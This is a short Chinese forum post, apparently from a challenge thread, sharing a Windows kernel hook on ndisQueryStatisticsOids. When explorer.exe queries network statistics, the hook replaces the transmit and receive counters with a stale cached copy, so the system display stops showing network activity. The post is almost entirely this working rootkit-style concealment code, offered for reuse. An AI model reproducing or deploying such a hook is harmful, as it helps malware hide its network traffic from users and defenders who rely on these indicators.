大牛们都发代码了,我也来凑凑热闹吧~
3,4,5题没什么意思了,发下第二题的关键部分吧~
处理ndisQueryStatisticsOids细致一点就可以很好的解决其他思路的缺陷了~
代码:
NTSTATUS
Fake_ndisQueryStatisticsOids(PVOID argv1,
PVOID argv2,
ULONG Request[],
ULONG RequestLen,
PVOID MdlAddress,
SIZE_T NumberOfBytes,
PIRP AssociatedIrp,
PBOOLEAN Success)
{
NTSTATUS status;
PVOID Process;
ULONG i, type;
PNetResponse Response, gPrev;
PCHAR pCResponse;
pCResponse = (PCHAR)MdlAddress;
Process = (PVOID)PsGetCurrentProcess();
if (0 == _strnicmp(MAKE_OFFSET(Process, Offset_ImageFileName), "explorer.exe", 11) && NULL != MdlAddress)
{
/*First, we copy a statistics*/
if (NULL == pPreviousBuffer)
{
status = Real_ndisQueryStatisticsOids(argv1, argv2, Request, RequestLen, MdlAddress, NumberOfBytes, AssociatedIrp, Success);
if (!NT_SUCCESS(status))
return status;
pPreviousBuffer = ExAllocatePool(NonPagedPool, NumberOfBytes);
if (NULL == pPreviousBuffer)
return STATUS_INSUFFICIENT_RESOURCES;
RtlCopyMemory(pPreviousBuffer, MdlAddress, NumberOfBytes);
}
else
{
status = Real_ndisQueryStatisticsOids(argv1, argv2, Request, RequestLen, MdlAddress, NumberOfBytes, AssociatedIrp, Success);
if (!NT_SUCCESS(status))
return status;
/*We replace some updated data here using previous statistics*/
i = 0;
while (i < RequestLen - 1)
{
Response = (PNetResponse)pCResponse;
type = Response->Type & 0x0FFFFFFF;
/*we should replace XMIT & RCV Statistics data*/
if (type > 0x00020000 && type < 0x0002020D)
{
gPrev = (PNetResponse)((ULONG)pPreviousBuffer + (ULONG)(Response) - (ULONG)MdlAddress);
RtlCopyMemory(&Response->Data, &gPrev->Data, Response->Length);
}
i++;
pCResponse += Response->Length + 8;
/*Some stupid input? */
if (Response->Length > 8)
break;
}
}
return status;
}
else
return Real_ndisQueryStatisticsOids(argv1, argv2, Request, RequestLen, MdlAddress, NumberOfBytes, AssociatedIrp, Success);
}